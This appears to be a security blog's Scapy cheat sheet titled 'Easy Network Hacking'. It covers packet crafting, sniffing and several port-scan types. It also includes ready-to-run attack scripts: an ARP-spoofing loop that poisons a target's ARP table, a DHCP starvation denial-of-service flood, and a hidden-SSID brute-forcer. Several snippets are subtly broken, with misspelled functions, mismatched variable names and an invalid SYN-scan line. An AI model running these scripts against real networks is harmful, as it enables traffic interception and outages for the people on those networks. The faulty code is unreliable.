Easy Network Hacking – Scapy

Detect Sniffer

Detects sniffers on the network

is_promisc("ip_address")
promiscping("192.168.1.0/24", timeout=2)

 

Create Packet

+ TCP

tcp = TCP()
tcp.show()
tcp.display()
tcp.dport = 80


+ ICMP

icmp = ICMP()
icmp.show()
icmp.display()
icmp.type = "echo-request"


+ IP

ip = IP()
ip.show()
ip.display()
ip.src = RandSort()


+ ARP

arp = ARP()
arp.show()
arp.display()
arp.hwsrc = RandMAC()


+ UDP

udp = UDP()
udp.show()
udp.display()
udp.dport = 53


+ DNS

dns  = IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.google.com"))
a, un = sr1(dns, verbose=0)
print a[DNS].summary()


+ DHCP 

dhcp = DHCP() / BOOTP()
dhcp.show()
dhcp.display()
dhcp[BOOTP].op = "BOOTREQUEST"
dhcp[BOOTP].giaddr = "gateway_ip_address"

 

Working with Packets

+ It's like a list (python)

packets = sniff(count=7)
for pkt in packets:
   #Do something

+ Summary of captured packet

packets = sniff(count=7)
packet.summary()


+ Summary of captured packet with packet number

packets = sniff(count=7)
packet.nsummary()


+ Accessing the packets members (we will access the 3rd packets)

packets = sniff(count=7)
pkt = packets[2]

 

Port Scan

+ SYN Scan

syn = IP(dst="72.14.207.x")/TCP(dport=80,flags="S")
sr1(syn)


+ ACK Scan

ack = IP(dst="72.14.207.x")/TCP(dport=80,flags="A")
sr1(ack)


+ UDP Scan

udp = IP(dst="192.168.1.x")/UDP(dport=[443,666])
sr(udp)


+ XMAS Scan

xmas = IP(dst=dst_ip)/TCP(dport=dst_port,flags="FPU")
sr1(xmass, timeout=2)


+ FIN Scan

fin = IP(dst=dst_ip)/TCP(dport=dst_port,flags="F")
sr1(fin, timeout=10)

+ NULL Scan

null = IP(dst=dst_ip)/TCP(dport=dst_port,flags="")
sr1(null, timeout=10)

 

Sniff

sniff(iface='eth0', filter='arp',count=5)

sniff(iface='wlan0', count=7, prn=Beacon)

sniff(offline='cypm.pcap', prn=Analiz)

 

Sniffing at Wireless Networks

packets = sniff(iface='wlan0mon', prn=KablosuzAnaliz)

pkt.type 
#(Management(0), Data(1))

pkt.subtype
#(Beacon(8), ProbeReq(4), ProbeResp(5))

pkt.info
#(SSID info)


ord(pkt0[Dot11Elt:3].info)
#(Kanal numarası)


256-(ord(pkt.notdecoded[-4:-3]))
#(Sinyal gücü)

 

Identifying Active Computers

Detects active computers on the network

arping("192.168.1.0/24")

 

Ping

It can be used to generate an ICMP packet.

#!/usr/bin/env python

import sys
from scapy.all import *

packet = IP(dst='ip_for_ping') / ICMP()
sr1(packet)

 

Traceroute

traceroute(["www.canyoupwn.me"],maxttl=20)

 

Nslookup

Used to send a DNS query

#!/usr/bin/env python

import sys
from scapy.all import *

host  = sys.argv[1]
result = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=host)),verbose=0)
print result[DNSRR].rdata

 

ARPSpoof

It is used to poison the ARP table.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
from scapy.all import *

conf.verb     = 0

op     	      =  2
attackerMAC   = 'c4:6e:1f:17:ed:b3'  
gateway       = '192.168.2.1'	    	  
targetIP      = '192.168.2.48'       

arp=ARP(op=op,psrc=gateway,pdst=targetIP, hwsrc=attackerMAC)
print "Started ARP Attack ... "
try:
  while 1:
    send(arp, iface='wlan0')
    time.sleep(2)

except KeyboardInterrupt:
  print "Stoped Attack"

 

DHCP Attack

#!/usr/bin/env python

import sys
from scapy.all import *

conf.iface = 'wlan0'
conf.verb  = 0

print "DHCP DoS Attack ..."

pkt = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[("message-type", 'discover'), 'end'])

sendp(pkt, loop=1)

 

SYN Scan

Used to send SYN Pack.

#!/usr/bin/env python

import sys
from scapy.all import *

syn = (IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="S"),timeout=10)

sr1(syn)

 

SSID Brute-Force

This method can be used if there is a hidden AP device and no clients are connected.

#!/usr/bin/env python

from scapy.all import *

ssidlist = ["Hidden", "James", "Test", "HiddenSSID"]

client   = "bb:bb:bb:bb:bb:bb"
AP_mac   = "4E:f2:08:80:aa:bb"
for ssid in ssidlist:
  
  probe  = RadioTap() 
  probe /= Dot11(type=0, subtype=4, addr1=broadmac, addr2=client, addr3=broadmac) 
  probe /= Dot11ProbeReq() / Dot11Elt(ID=0, info=ssid.strip()) 
  probe /= Dot11Elt(ID=1, info="\x82\x84\x8b\x96\x24\x30\x48\x60\x6c") 
  probe /= Dot11Elt(ID=3, info="\x06")
  sendp(probe, iface="wlan0", count=3, inter = .3)

Besim ALTINOK

Cyber Security Researcher

Easy Network Hacking – Scapy” hakkında 1 yorum

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir